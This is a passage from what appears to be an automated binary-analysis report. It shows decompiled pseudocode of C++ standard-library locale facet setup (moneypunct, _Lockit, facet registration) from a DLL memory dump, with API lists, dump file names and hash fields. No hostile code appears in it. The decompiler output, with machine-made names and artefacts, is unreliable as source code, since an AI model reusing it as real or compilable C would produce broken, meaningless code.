						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E1DC120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t198 - 0x20);
							E6E1E3D74(_t198 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t184, _t189, 0x14);
							E6E1C6653(_t198 - 0x14, 0);
							_t190 =  *0x6e286e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1A161C(0x6e286e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E1C66BA(_t198 - 0x14);
								return E6E1E0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E1DC1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t198 - 0x20);
										E6E1E3D74(_t198 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t141, _t185, _t190, 0x14);
										E6E1C6653(_t198 - 0x14, 0);
										_t191 =  *0x6e286e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1A161C(0x6e286e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E1C66BA(_t198 - 0x14);
											return E6E1E0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E1DC229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t198 - 0x20);
													E6E1E3D74(_t198 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t141, _t186, _t191, 0x14);
													E6E1C6653(_t198 - 0x14, 0);
													_t192 =  *0x6e286e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1A161C(0x6e286e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E1C66BA(_t198 - 0x14);
														return E6E1E0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E1DC295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1A1438(_t169);
																E6E1E3D74(_t198 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e22851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e22c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E1DD028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E1E0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E1C6FD3(__eflags, _t187);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e286e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E1C6FD3(__eflags, _t186);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e286e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E1C6FD3(__eflags, _t185);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e286e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E1C6FD3(__eflags, _t184);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e286e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DB9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB9F5
int.LIBCPMT ref: 6E1DBA0C

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1DBA2F
std::_Facet_Register.LIBCPMT ref: 6E1DBA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBA84

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 5709c3a301dc118c4cbb8ba1b28144a7cf516029de0aae17c5bf51a69324997c
Instruction ID: f6341a073776d5cda293499c847775b3163cf861162d397071e0a35119c0ee1c
Opcode Fuzzy Hash: 5709c3a301dc118c4cbb8ba1b28144a7cf516029de0aae17c5bf51a69324997c
Instruction Fuzzy Hash: 24115CB591052DCBCF01DBD4C884FFEB37AAF55704F140908E411AB290CF749A89E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF60D, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF60D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t167;
				signed int _t168;
				void* _t180;
				void* _t193;
				void* _t206;
				void* _t219;
				void* _t232;
				void* _t245;
				void* _t258;
				void* _t271;
				void* _t284;
				void* _t297;
				signed int _t435;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				void* _t506;

				_t469 = __edx;
				_t358 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t506 - 0x14, 0);
				_t483 =  *0x6e286df4; // 0x0
				 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
				 *(_t506 - 0x10) = _t483;
				_t167 = E6E1A161C(0x6e286da0);
				_t361 =  *((intOrPtr*)(_t506 + 8));
				_t168 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t167);
				_t471 = _t168;
				if(_t168 != 0) {
					L5:
					E6E1C66BA(_t506 - 0x14);
					return E6E1E0075(_t471);
				} else {
					if(_t483 == 0) {
						_push( *((intOrPtr*)(_t506 + 8)));
						_push(_t506 - 0x10);
						__eflags = E6E1D11AB(__ebx, _t361, __edx, _t471, _t483) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t506 - 0x20);
							E6E1E3D74(_t506 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t471, _t483, 0x14);
							E6E1C6653(_t506 - 0x14, 0);
							_t484 =  *0x6e286dc8; // 0x0
							 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
							 *(_t506 - 0x10) = _t484;
							_t180 = E6E1A161C(0x6e286d7c);
							_t368 =  *((intOrPtr*)(_t506 + 8));
							_t472 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t180);
							__eflags = _t472;
							if(_t472 != 0) {
								L12:
								E6E1C66BA(_t506 - 0x14);
								return E6E1E0075(_t472);
							} else {
								__eflags = _t484;
								if(_t484 == 0) {
									_push( *((intOrPtr*)(_t506 + 8)));
									_push(_t506 - 0x10);
									__eflags = E6E1D1230(_t358, _t368, __edx, _t472, _t484) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t506 - 0x20);
										E6E1E3D74(_t506 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t358, _t472, _t484, 0x14);
										E6E1C6653(_t506 - 0x14, 0);
										_t485 =  *0x6e286dc4; // 0x0
										 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
										 *(_t506 - 0x10) = _t485;
										_t193 = E6E1A161C(0x6e286d78);
										_t375 =  *((intOrPtr*)(_t506 + 8));
										_t473 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t193);
										__eflags = _t473;
										if(_t473 != 0) {
											L19:
											E6E1C66BA(_t506 - 0x14);
											return E6E1E0075(_t473);
										} else {
											__eflags = _t485;
											if(_t485 == 0) {
												_push( *((intOrPtr*)(_t506 + 8)));
												_push(_t506 - 0x10);
												__eflags = E6E1D12B4(_t358, _t375, __edx, _t473, _t485) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t506 - 0x20);
													E6E1E3D74(_t506 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t358, _t473, _t485, 0x14);
													E6E1C6653(_t506 - 0x14, 0);
													_t486 =  *0x6e286dd8; // 0x0
													 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
													 *(_t506 - 0x10) = _t486;
													_t206 = E6E1A161C(0x6e286d84);
													_t382 =  *((intOrPtr*)(_t506 + 8));
													_t474 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t206);
													__eflags = _t474;
													if(_t474 != 0) {
														L26:
														E6E1C66BA(_t506 - 0x14);
														return E6E1E0075(_t474);
													} else {
														__eflags = _t486;
														if(_t486 == 0) {
															_push( *((intOrPtr*)(_t506 + 8)));
															_push(_t506 - 0x10);
															__eflags = E6E1D1339(_t358, _t382, _t469, _t474, _t486) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t506 - 0x20);
																E6E1E3D74(_t506 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t358, _t474, _t486, 0x14);
																E6E1C6653(_t506 - 0x14, 0);
																_t487 =  *0x6e286db0; // 0x0
																 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																 *(_t506 - 0x10) = _t487;
																_t219 = E6E1A161C(0x6e286d64);
																_t389 =  *((intOrPtr*)(_t506 + 8));
																_t475 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t219);
																__eflags = _t475;
																if(_t475 != 0) {
																	L33:
																	E6E1C66BA(_t506 - 0x14);
																	return E6E1E0075(_t475);
																} else {
																	__eflags = _t487;
																	if(_t487 == 0) {
																		_push( *((intOrPtr*)(_t506 + 8)));
																		_push(_t506 - 0x10);
																		__eflags = E6E1D13A1(_t358, _t389, _t469, _t475, _t487) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t506 - 0x20);
																			E6E1E3D74(_t506 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t358, _t475, _t487, 0x14);
																			E6E1C6653(_t506 - 0x14, 0);
																			_t488 =  *0x6e286ddc; // 0x0
																			 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																			 *(_t506 - 0x10) = _t488;
																			_t232 = E6E1A161C(0x6e286d88);
																			_t396 =  *((intOrPtr*)(_t506 + 8));
																			_t476 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t232);
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L40:
																				E6E1C66BA(_t506 - 0x14);
																				return E6E1E0075(_t476);
																			} else {
																				__eflags = _t488;
																				if(_t488 == 0) {
																					_push( *((intOrPtr*)(_t506 + 8)));
																					_push(_t506 - 0x10);
																					__eflags = E6E1D1409(_t358, _t396, _t469, _t476, _t488) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t506 - 0x20);
																						E6E1E3D74(_t506 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t358, _t476, _t488, 0x14);
																						E6E1C6653(_t506 - 0x14, 0);
																						_t489 =  *0x6e286de0; // 0x0
																						 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																						 *(_t506 - 0x10) = _t489;
																						_t245 = E6E1A161C(0x6e286d8c);
																						_t403 =  *((intOrPtr*)(_t506 + 8));
																						_t477 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t245);
																						__eflags = _t477;
																						if(_t477 != 0) {
																							L47:
																							E6E1C66BA(_t506 - 0x14);
																							return E6E1E0075(_t477);
																						} else {
																							__eflags = _t489;
																							if(_t489 == 0) {
																								_push( *((intOrPtr*)(_t506 + 8)));
																								_push(_t506 - 0x10);
																								__eflags = E6E1D1471(_t358, _t403, _t469, _t477, _t489) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t506 - 0x20);
																									E6E1E3D74(_t506 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t358, _t477, _t489, 0x14);
																									E6E1C6653(_t506 - 0x14, 0);
																									_t490 =  *0x6e286dfc; // 0x0
																									 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																									 *(_t506 - 0x10) = _t490;
																									_t258 = E6E1A161C(0x6e286da8);
																									_t410 =  *((intOrPtr*)(_t506 + 8));
																									_t478 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t258);
																									__eflags = _t478;
																									if(_t478 != 0) {
																										L54:
																										E6E1C66BA(_t506 - 0x14);
																										return E6E1E0075(_t478);
																									} else {
																										__eflags = _t490;
																										if(_t490 == 0) {
																											_push( *((intOrPtr*)(_t506 + 8)));
																											_push(_t506 - 0x10);
																											__eflags = E6E1D14EC(_t358, _t410, _t469, _t478, _t490) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t506 - 0x20);
																												E6E1E3D74(_t506 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t358, _t478, _t490, 0x14);
																												E6E1C6653(_t506 - 0x14, 0);
																												_t491 =  *0x6e286dcc; // 0x0
																												 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																												 *(_t506 - 0x10) = _t491;
																												_t271 = E6E1A161C(0x6e286d80);
																												_t417 =  *((intOrPtr*)(_t506 + 8));
																												_t479 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t271);
																												__eflags = _t479;
																												if(_t479 != 0) {
																													L61:
																													E6E1C66BA(_t506 - 0x14);
																													return E6E1E0075(_t479);
																												} else {
																													__eflags = _t491;
																													if(_t491 == 0) {
																														_push( *((intOrPtr*)(_t506 + 8)));
																														_push(_t506 - 0x10);
																														__eflags = E6E1D1558(_t358, _t417, _t469, _t479, _t491) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t506 - 0x20);
																															E6E1E3D74(_t506 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t358, _t479, _t491, 0x14);
																															E6E1C6653(_t506 - 0x14, 0);
																															_t492 =  *0x6e286e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6E1A161C(0x6e286dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6E1C66BA(_t506 - 0x14);
																																return E6E1E0075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6E1D15C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t506 - 0x20);
																																		E6E1E3D74(_t506 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t358, _t480, _t492, 0x14);
																																		E6E1C6653(_t506 - 0x14, 0);
																																		_t493 =  *0x6e286dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6E1A161C(0x6e286d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6E1C66BA(_t506 - 0x14);
																																			return E6E1E0075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6E1D162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6E1A1438(_t435);
																																					E6E1E3D74(_t506 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e22851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6e22c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6E1D542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6E1E0075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t481);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6e286dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t480);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6e286e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6E1C6FD3(__eflags, _t479);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6e286dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6E1C6FD3(__eflags, _t478);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6e286dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6E1C6FD3(__eflags, _t477);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6e286de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6E1C6FD3(__eflags, _t476);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6e286ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6E1C6FD3(__eflags, _t475);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6e286db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6E1C6FD3(__eflags, _t474);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6e286dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6E1C6FD3(__eflags, _t473);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6e286dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6E1C6FD3(__eflags, _t472);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6e286dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6E1C6FD3(__eflags, _t471);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6e286df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF614
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF61E
int.LIBCPMT ref: 6E1CF635

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF658
std::_Facet_Register.LIBCPMT ref: 6E1CF66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF6AD

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: c3aba37693dce5e3e91ad2213e1dcd5650bdaf6fe76a8a632be2ce1f24524442
Instruction ID: 0ba74a86facee1b64f7d6815e1ecc4955b8caf8c0b0232535b29cf9f0bdeb863
Opcode Fuzzy Hash: c3aba37693dce5e3e91ad2213e1dcd5650bdaf6fe76a8a632be2ce1f24524442
Instruction Fuzzy Hash: F1115CB59105298FCF01DBE4C854AFEB7BAAF68B14F240808D430F7290CF789985E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB74C, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t374 - 0x14, 0);
				_t357 =  *0x6e286e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1A161C(0x6e286e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E1C66BA(_t374 - 0x14);
					return E6E1E0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E1DBF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t374 - 0x20);
							E6E1E3D74(_t374 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t348, _t357, 0x14);
							E6E1C6653(_t374 - 0x14, 0);
							_t358 =  *0x6e286e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1A161C(0x6e286e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E1C66BA(_t374 - 0x14);
								return E6E1E0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E1DBFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t374 - 0x20);
										E6E1E3D74(_t374 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t265, _t349, _t358, 0x14);
										E6E1C6653(_t374 - 0x14, 0);
										_t359 =  *0x6e286e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1A161C(0x6e286e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E1C66BA(_t374 - 0x14);
											return E6E1E0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E1DC050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t374 - 0x20);
													E6E1E3D74(_t374 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t265, _t350, _t359, 0x14);
													E6E1C6653(_t374 - 0x14, 0);
													_t360 =  *0x6e286e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1A161C(0x6e286e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E1C66BA(_t374 - 0x14);
														return E6E1E0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
